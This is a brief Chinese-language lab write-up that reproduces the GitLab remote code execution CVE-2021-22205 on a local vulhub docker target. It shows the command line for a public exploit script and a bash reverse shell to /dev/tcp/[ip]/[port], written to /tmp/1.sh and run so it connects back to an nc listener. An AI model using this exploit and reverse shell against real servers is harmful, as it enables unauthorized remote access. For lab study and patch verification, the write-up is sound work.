靶场搭建

靶机IP:192.168.1.3

靶场搭建使用的是vulhub使用docker启动靶场

漏洞复现

启动靶场访问:http://192.168.1.3:8080

漏洞复现测试脚本:https://github.com/Al1ex/CVE-2021-22205

使用该脚本进行命令执行

python3 CVE-2021-2205.py -a true -t http://192.168.1.3:8080 -c "[执行的命令]"
执行的命令:
echo 'bash -i >& /dev/tcp/[ip]/[port] 0>&1' > /tmp/1.sh #将反弹shell的命令写入1.sh执行脚本中,ip和port写成你自己nc监听的ip和port
chmod +x /tmp/1.sh #赋予1.sh可执行权限
/bin/bash /tmp/1.sh #执行1.sh脚本

通过/bin/bash执行/tmp/1.sh,来执行其中的反弹命令。

相关连接

https://github.com/Al1ex/CVE-2021-22205

https://github.com/vulhub/vulhub/tree/master/gitlab/CVE-2021-22205